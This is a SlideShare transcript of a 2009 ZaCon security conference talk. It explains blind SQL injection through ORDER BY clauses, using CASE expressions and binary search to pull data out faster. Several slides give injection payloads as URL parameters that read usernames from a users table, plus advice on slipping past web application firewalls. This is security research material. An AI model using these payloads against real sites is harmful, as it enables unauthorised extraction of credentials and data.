Efficient extraction of data using binary search and ordering information

823 views

Published on

Yusuf Motara
ZaCon 2009
http://www.zacon.org.za/Archives/2009/slides/

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
823
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Efficient extraction of data using binary search and ordering information

  1. 1.   “select * from customers order by ” + injection + “ asc”   Read-only exploitable? Not really… ›  Can’t UNION with anything else ›  Can’t add columns   We can tell or guess… ›  Number of columns ›  Column names   Even if we know the DB layout, we can’t get info out with ORDER BY
  2. 2.   CASE expressions allowed in ORDER BY ›  site.co.za/?o=case when 1=2 then ID else Address end   Which we can use to extract data! ›  CASE WHEN expr THEN value [ELSE value] END   There’s actually a second CASE syntax, too ›  expr can be a SQL statement   site.co.za/?o=casewhen (select top 1 substring(username,1,1) from users)=‘a’ then ID else Address end
  3. 3.   Assuming all data items are lowercase ›  And assuming that we go in alphabetical order   Then: ›  56 queries to return “john” ›  65 queries to return “martin” ›  119 queries to return “johenius”   Extend to uppercase+digits+special ›  “K1ngArthur!” would take a few hundred queries.
  4. 4.   Binary-search (courtesy Wikipedia) ›  BSearch(A[0..N-1], v, l, h): if (h < l) return -1 // not found m = low + ((h - l) / 2) if (A[m] > v) return BSearch(A, v, l, m-1) else if (A[m] < v) return BSearch(A, v, m+1, h) else return m // found   site.co.za/?o=case when (select top 1 username from users) <= candidate then ID else Address end
  5. 5.   Howdo we find candidates? Strings aren’t numbers! ›  Create ordered alphabet ›  Create stringnumber conversion funcs   Trivial, aside from big-numberness   What are our initial bounds? ›  Minimum is 0 ›  Maximum can be found by binary-search on length
  6. 6.   How do we order our alphabet? ›  Initially, I thought to do it via built-in lexicographic comparison..   … which fails for certain cases due to SQL collation differences ›  Use ordering queries to initialize alphabet instead   This can take ~300 queries for a ~90-character alphabet.   Amortised over total number of queries   Or, make a guess and run against local server
  7. 7.   Comparisons done by SQL engine ›  Case-insensitive generally ›  COLLATION matters! ›  ‘mooo’ < ‘moo’’a’, but ‘mooo’ > ‘moo’’z’, according to SQL Server ›  Solution/workaround: compare as binary
  8. 8.   Running into WAFs and other protections ›  “e[<zmo~~~~~~” is detected as an attack   So is “Lor,w&#$Jo..”   Go lower? Go higher? No way of knowing. ›  Workaround: remove “<“ and “&” from alphabet.   Better ideas welcome!   Alphabet must be complete ›  Or you must be a better SQL ninja than I am 
  9. 9.   How do we get to the next record? ›  Can’t use SELECT LIKE – we don’t know what the next record looks like ›  If DB supports RowID, and you can use it, use it ›  Otherwise…   “… where [targetCol] not in (‘foo’, ‘bar’, …)”
  10. 10.   Binarysearch is O(log2(n)) at best, and O (log2(n)+1) at worst ›  However, a single iteration may cause two requests   How good is this news? ›  This is a lot of complexity! It’d better be worth it…
  11. 11. 10000 1000 100 10 Binary-search 1 Simple
  12. 12. 3000 2500 2000 1500 1000 500 Binary-search 0 Simple
  13. 13. 0.0x 1.0x 2.0x 3.0x 4.0x 5.0x 6.0x 7.0x 8.0x john harry 1337hax0r GuessAgain zongo robert SarahJessicaParkedHere m0ronz O'Neill johnsmith Speedup sally p@ssw0rd7 VeryLongPassword,PrettyMuch Uncrackable drongo love1977 AndGotATicket ~R_Us!! Kern3l'O'Neill
  14. 14.   4x minimum speedup, 6x average speedup ›  The difference between waiting 6 minutes or 1 minute   Can be adapted trivially to extract integer, floating-point, GUID, etc ›  Extremely good at approximating answer   Good way to exploit ORDER BY, which has traditionally been considered a difficult injection point
  15. 15.   Use only when necessary! ›  Relies on a 1-bit side-channel; smuggling data out this way is going to be slow.   Gets slower with each record ›  Amount of data sent increases ›  GET length limits you; POST is best   Wasteful due to ordering queries, unless: ›  More than 2 records are to be extracted ›  Collation is guessed, and local server used
  16. 16.   Many more optimisations possible ›  Better SQL ›  Adaptive SQL   Pattern-matched row exclusion   Adaptive querying once sufficient unique characters have been discovered ›  Fewer queries   Possible to use “<=” only, given that binary- search is best-case O(log2(n)) ›  Collation tables instead of ordering queries
  17. 17.   Techniquecan be generalized to suit any data extraction area ›  Necessary: comparison operation result ›  XPath? Efficient GUID extraction? Dates?   Could be used as a n-bit channel ›  where n = number of ORDER BY clauses that return different results   Needs testing; ‘tis merely a PoC. ›  I know there are some minor bugs…
  18. 18.   WillI continue with this? Probably not.   cinyc.s – AT – gmail.com

×